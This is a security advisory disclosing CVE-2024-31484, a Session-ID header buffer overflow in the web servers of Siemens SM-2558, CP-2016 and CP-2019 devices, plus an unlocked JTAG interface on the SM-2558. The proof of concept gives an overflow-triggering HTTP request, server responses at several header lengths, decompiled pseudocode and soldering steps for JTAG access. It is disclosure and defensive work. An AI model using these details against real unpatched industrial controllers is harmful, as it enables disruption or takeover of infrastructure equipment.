Unlocked JTAG interface and buffer overflow in Siemens SM-2558 Protocol Element (extension module for Siemens SICAM AK3/TM/BC), Siemens CP-2016 & CP-2019

Title

Unlocked JTAG interface and buffer overflow

Product

Siemens SM-2558 Protocol Element (extension module for Siemens SICAM AK3/TM/BC), Siemens CP-2016 & CP-2019

Vulnerable Version

See description

Fixed Version

See description

CVE Number

CVE-2024-31484

Impact

high

Homepage

https://www.siemens.com

Found

11.07.2023

By

Stefan Viehböck (Office Linz), Constantin Schieber-Knöbl (Office Vienna) | SEC Consult Vulnerability Lab

The webservers running on the Siemens Communication Elements CPCX26 for CP-2016 and CPCX26 for CP-2019 PLCs as well as on the SM-2558 Protocol Element exposed a buffer overflow vulnerability in the parsing of a HTTP Header. Additionally, full access to the JTAG interface of the Zynq-7000 on the SM-2558 module is possible, but the hardware is end of life and won't receive a fix.

Vendor description

"We are a technology company focused on industry, infrastructure, transport, and healthcare. From more resource-efficient factories, resilient supply chains, and smarter buildings and grids, to cleaner and more comfortable transportation as well as advanced healthcare, we create technology with purpose adding real value for customers."

Source: https://new.siemens.com/global/en/company/about.html

Business recommendation


Upgrade to the latest firmware version to mitigate the buffer overflow.

The hardware (SM-2558) is considered end of life (EOL), thus no new version with a fixed JTAG will be released. Restrict physical access to the device.

SEC Consult highly recommends to perform a thorough security review of the product conducted by security professionals to identify and resolve potential further security issues.


Vulnerability overview/description

1) Unlocked JTAG Interface of Zynq-7000 on SM-2558

The JTAG interface can be accessed with physical access to the PCB. After slightly modifying the hardware it is possible to connect to the interface with full access to the communication module.  

2) Buffer Overflow on the Webserver of the SM-2558, CP-2016 & CP-2019 (CVE-2024-31484)

The webserver running on the SM-2558 device as well as CP-2016 and CP-2019 is vulnerable to a buffer overflow vulnerability.

The value of the HTTP header "Session-ID" is processed and used in an "sprintf" call without proper length checking. The target buffer is in the BSS segment and likely 1024 bytes in length. The buffer overflows into several other global data structures.


Proof of concept

1) Unlocked JTAG Interface of Zynq-7000 on SM-2558 

The JTAG interface pins (TDI, TDO, TCK, TMS, GND) are accessible on a populated 20-pin header on the PCB (see figure_1).

A removed connection needs to be restored by soldering an additional wire between two exposed contacts (see figure_2), as the JTAG interface of the Zynq-7000 is daisy-chained with the JTAG interface of the Broadcom BCM53101M Ethernet controller. The pad in question connects to pin A57 (TDI) of the Ethernet controller. After connecting to the pins, a connection to the Zynq-7000 JTAG interface is possible. E.g., memory can be dumped (figure 5), execution can be single stepped  (figure 4) or halted (figure 3), and variables changed. This grants an attacker with physical access full control of the communication module.  

Figure 1
Figure 2
Figure 3
Figure 4
Figure 5

2) Buffer Overflow on the Webserver of the SM-2558, CP-2016 & CP-2019 (CVE-2024-31484)

The vulnerability can be triggered with a HTTP POST request similar to the following one:

POST /SICAM_TOOLBOX_1703_remote_connection_01.htm HTTP/1.1
User-Agent: SICAM TOOLBOX II
Version: 1
Session-ID: 3814280BA9922f30_BOF_PAYLOAD_HERE
Sequence-ID: 525
Content-Length: 54
Content-Type: text/plain
KeepAlive: 5
Connection: close

type=1&length=15&data=0780640202fef1e60000feff0100c2

Here are a few observations with different Session-ID values:

a) Session ID value 3814280BA9922f30 results in normal behavior 

HTTP/1.1 200 OK
Server: SICAM 1703
Version: 1
Session-ID: 3814280BA992fd0
Sequence-ID: 1
Content-Type: text/plain
Content-Length: 8

type=4

b) Session ID value 3814280BA992fd00000000000000 results in normal behavior 

HTTP/1.1 200 OK
Server: SICAM 1703
Version: 1
Session-ID: 3814280BA992fd00000000000000
Sequence-ID: 1
Content-Type: text/plain
Content-Length: 0

c) Session ID value 3814280BA992fd00000000000000... (in total 618 characters) results in three HTTP responses 

HTTP/1.1 200 OK
Server: SICAM 1703
Version: 1
Session-ID: 3814280BA992fd000000HTTP/1.1 200 OK
Server: SICAM 1703
Version: 1
Session-ID: 3814280BA992fd000000HTTP/1.1 200 OK
Server: SICAM 1703
Version: 1
Session-ID: 3814280BA992
Sequence-ID: 1
Content-Type: text/plain
Content-Length: 8

type=4

d) Session ID value 3814280BA992fd00000000000000... (in total 1260 characters) results in a HTTP 500 - internal server error 

HTTP/1.1 500 Internal Server Error
Content-Type: text/html
Content-Length: 198

<html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>Sorry, an unexpected internal server error occurred while processing your request.</p></body></html>

Pseudocode of vulnerable function: 

[...]
    sessiond_id = (char *)get_http_header(a1, (int)"Session-ID"); <<<<<<<<<<<<<<<< session_id is extracted from HTTP request
    if ( !sessiond_id )
      goto LABEL_194;
    if ( unk_51CD1C )
    {
      v11 = 0;
    }
    else
    {
      sub_3DB0E4((unsigned int)byte_51CD08, (unsigned int)sessiond_id, 0x14u);
      v11 = 1;
    }
    if ( sub_15332C() == 1 )
    {
      v134 = 0;
      if ( sub_155BC4(a1, (int)v133) || !v134 )
      {
LABEL_49:
        sequence_id = get_http_header_int(a1, "Sequence-ID");
        sprintf(                      <<<<<<<<<<<<<<<< response_buffer overflows here
          response_buffer,
          "HTTP/1.1 200 OK\r\n"
          "Server: %s\r\n"
          "Version: %u\r\n"
          "Session-ID: %s\r\n"
          "Sequence-ID: %lu\r\n"
          "Content-Type: text/plain\r\n"
          "Content-Length: 0\r\n"
          "\r\n",
          "SICAM 1703",
          1,
          sessiond_id,
          sequence_id);
[...]

Vulnerable / tested versions

The following version has been tested which was the latest version available at the time of the test: 

  • Webserver that runs on Firmware Version 10A45 of the Zynq FPGA.   
  • The Hardware revision of the device was unknown.  

According to the vendor, the following firmware versions for the SM-2558 are affected by CVE-2024-31484:

  • ETA4 Ethernet Interface IEC60870-5-104: All versions < V10.46
  • ETA5 Ethernet Int. 1x100TX IEC61850 Ed.2: All versions < V03.27

Note that the same vulnerability exists as well in other products' firmware versions, namely:

  • CPCX26 Central Processing/Communication for CP-2016: All versions < V06.02
  • PCCX26 Ax 1703 PE, Contr, Communication Element for CP-2019: All versions < V06.05

Vendor contact timeline

2024-03-05 Contacting vendor through productcert@siemens.com
2024-03-06 Siemens tracks this as #22436
2024-04-03 Requested status update.
2024-04-03 Siemens can reproduce vulnerabilities and will evaluate buffer overflow.Hardware is EOL, no fix for the JTAG issue.
2024-06-11 Siemens publishes SSA-620338 and confirms the buffer overflow.
2024-07 - 2024-09 Various vacation / absences, delaying advisory coordination.
2024-10-22 Meeting with ProductCERT, discussing release of SM-2558 advisory.
2024-10-31 Sending advisory draft to ProductCERT.
2024-11-14 Receiving feedback on advisory draft.
2024-11-19 Sending updated advisory to ProductCERT.
2024-11-25 Coordinated release of advisory.

Solution

The vendor provides patches for the affected devices / components to fix CVE-2024-31484:

  • ETA4 for SM-2558: Upgrade to V10.46
  • ETA5 for SM-2558: Upgrade to V03.27
  • CPCX26 for CP-2016: Upgrade to V06.02
  • PCCX26 for CP-2019: Upgrade to V06.05

More detailed information can be found in the Siemens Security Advisory SSA-620338:
https://cert-portal.siemens.com/productcert/html/ssa-620338.html

The hardware (SM-2558) is considered end of life (EOL), thus no new version with a fixed JTAG will be released. Restrict physical access to the device.

Workaround

Make sure to strictly limit physical access to the PLCs containing the protocol element during and also after its life cycle.

Advisory URL

https://sec-consult.com/vulnerability-lab/

 

EOF Stefan Viehböck, Constantin Schieber-Knöbl / @2024
 

Interested to work with the experts of SEC Consult? Send us your application
Interested in improving your cyber security with the experts of SEC Consult? Contact our local offices

Back